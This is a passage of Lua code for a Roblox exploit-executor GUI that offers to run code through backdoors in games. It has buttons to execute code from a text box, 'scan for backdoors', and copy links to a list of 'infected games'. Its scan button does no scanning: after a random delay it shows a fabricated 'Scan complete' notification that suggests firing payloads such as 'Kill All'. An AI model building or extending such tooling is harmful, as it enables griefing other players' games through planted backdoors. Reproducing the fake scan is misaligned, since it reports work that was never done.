		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Execute code/require from TextBox"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_21);
-- StarterGui.ScreenGui.Frame.Clear.LocalScript
local function C_25()
local script = G2L["25"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Clear TextBox"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_25);
-- StarterGui.ScreenGui.Frame.Inject.LocalScript
local function C_29()
local script = G2L["29"];
	local button = script.Parent
	local StarterGui = game:GetService("StarterGui")
	
	button.MouseButton1Click:Connect(function()
		local startTime = tick()
	
		-- Random delay between 0.05 and 0.10 seconds
		local delayTime = math.random(2, 4) / 100
		task.wait(delayTime)
	
		local endTime = tick()
		local elapsed = endTime - startTime
		local formattedTime = string.format("%.2f", elapsed)
	
		StarterGui:SetCore("SendNotification", {
			Title = "Scan complete",
			Text = "Scanned all RemoteEvents in " .. formattedTime .. "s. Check console or fire with test payload like Kill All.",
			Duration = 8
		})
	end)
end;
task.spawn(C_29);
-- StarterGui.ScreenGui.Frame.Inject.LocalScript
local function C_2a()
local script = G2L["2a"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Inject/scan for backdoors"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_2a);
-- StarterGui.ScreenGui.Frame.Inject.LocalScript
local function C_2b()
local script = G2L["2b"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		local screenGui = button:FindFirstAncestorOfClass("ScreenGui")
		if not screenGui then return end
	
		local frame = screenGui:FindFirstChild("Frame")
		if not frame then return end
	
		local labelFrame = frame:FindFirstChild("LabelFrame")
		if not labelFrame then return end
	
		local remoteLabel = labelFrame:FindFirstChild("RemoteLabel")
		if not remoteLabel or not remoteLabel:IsA("TextLabel") then return end
	
		remoteLabel.Text = "check to see if 'backdoor test' is printed or run test code like kill all."
	end)
end;
task.spawn(C_2b);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_2f()
local script = G2L["2f"];
	-- LocalScript inside a Button (TextButton or ImageButton)
	
	local button = script.Parent
	local screenGui = button:FindFirstAncestorOfClass("ScreenGui")
	local mainframe = screenGui:FindFirstChild("Frame")
	local gameframe = mainframe and mainframe:FindFirstChild("GamesFrame")
	
	button.MouseButton1Click:Connect(function()
		if gameframe then
			gameframe.Visible = not gameframe.Visible
		end
	end)
end;
task.spawn(C_2f);
-- StarterGui.ScreenGui.Frame.ImageButton.LocalScript
local function C_30()
local script = G2L["30"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Infected Games"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_30);
-- StarterGui.ScreenGui.Frame.Line.Frame.TextLabel.LocalScript
local function C_3d()
local script = G2L["3d"];
	local textLabel = script.Parent
	
	while true do
		textLabel.TextColor3 = Color3.fromHSV(tick() % 5 / 5, 1, 1)
		task.wait(0.03)
	end
end;
task.spawn(C_3d);
-- StarterGui.ScreenGui.Frame.Close.LocalScript
local function C_43()
local script = G2L["43"];
	local button = script.Parent
	local screenGui = button:FindFirstAncestorOfClass("ScreenGui")
	
	button.MouseButton1Click:Connect(function()
		if screenGui then
			screenGui:Destroy()
		end
	end)
end;
task.spawn(C_43);
-- StarterGui.ScreenGui.Frame.Close.LocalScript
local function C_44()
local script = G2L["44"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Close Serverside"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_44);
-- StarterGui.ScreenGui.Frame.Logs.LocalScript
local function C_48()
local script = G2L["48"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Change Logs"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_48);
-- StarterGui.ScreenGui.Frame.Logs.LocalScript
local function C_49()
local script = G2L["49"];
	local screenGui = script.Parent:FindFirstAncestorOfClass("ScreenGui")
	local frame = screenGui:FindFirstChild("Frame")
	local logsFrame = frame:FindFirstChild("UpdateFrame")
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		if logsFrame then
			logsFrame.Visible = not logsFrame.Visible
		end
	end)
end;
task.spawn(C_49);
-- StarterGui.ScreenGui.Frame.TextButton.LocalScript
local function C_4d()
local script = G2L["4d"];
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		local player = game:GetService("Players").LocalPlayer
		local character = player.Character or player.CharacterAdded:Wait()
		local humanoid = character:WaitForChild("Humanoid")
	
		humanoid.Health = 0
	end)
end;
task.spawn(C_4d);
-- StarterGui.ScreenGui.Frame.TextButton.LocalScript
local function C_4e()
local script = G2L["4e"];
	local button = script.Parent
	local player = game:GetService("Players").LocalPlayer
	local mouse = player:GetMouse()
	
	local tooltip
	
	button.MouseEnter:Connect(function()
		tooltip = Instance.new("TextLabel")
		tooltip.Text = "Respawn"
		tooltip.BackgroundTransparency = 0.3
		tooltip.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
		tooltip.TextColor3 = Color3.fromRGB(255, 255, 255)
		tooltip.Font = Enum.Font.SourceSans
		tooltip.TextSize = 14
		tooltip.Size = UDim2.new(0, 120, 0, 25)
		tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
		tooltip.ZIndex = 999
		tooltip.Name = "TLK88Tooltip"
		tooltip.TextScaled = true
		tooltip.Parent = button:FindFirstAncestorOfClass("ScreenGui")
	
		-- Update position every frame
		local connection
		connection = game:GetService("RunService").RenderStepped:Connect(function()
			if tooltip then
				tooltip.Position = UDim2.new(0, mouse.X + 10, 0, mouse.Y + 10)
			else
				connection:Disconnect()
			end
		end)
	end)
	
	button.MouseLeave:Connect(function()
		if tooltip then
			tooltip:Destroy()
			tooltip = nil
		end
	end)
end;
task.spawn(C_4e);
-- StarterGui.ScreenGui.Frame.GamesFrame.BD1.LocalScript
local function C_57()
local script = G2L["57"];
	-- LocalScript inside a Button (TextButton or ImageButton)
	
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		-- Copy link to clipboard (executor-only)
		setclipboard("https://www.roblox.com/games/84744183039358/Backdoored-game")
	
		-- Show notification
		game.StarterGui:SetCore("SendNotification", {
			Title = "Link Copied",
			Text = "Backdoored game link is now in your clipboard.",
			Duration = 5
		})
	end)
end;
task.spawn(C_57);
-- StarterGui.ScreenGui.Frame.GamesFrame.BD2.LocalScript
local function C_5c()
local script = G2L["5c"];
	-- LocalScript inside a Button (TextButton or ImageButton)
	
	local button = script.Parent
	
	button.MouseButton1Click:Connect(function()
		-- Copy link to clipboard (executor-only)
		setclipboard("https://www.roblox.com/games/130865439139266/School")
	
		-- Show notification
		game.StarterGui:SetCore("SendNotification", {
			Title = "Link Copied",
			Text = "Backdoored game link is now in your clipboard.",
			Duration = 5
		})
	end)
end;
task.spawn(C_5c);

return G2L["1"], require;
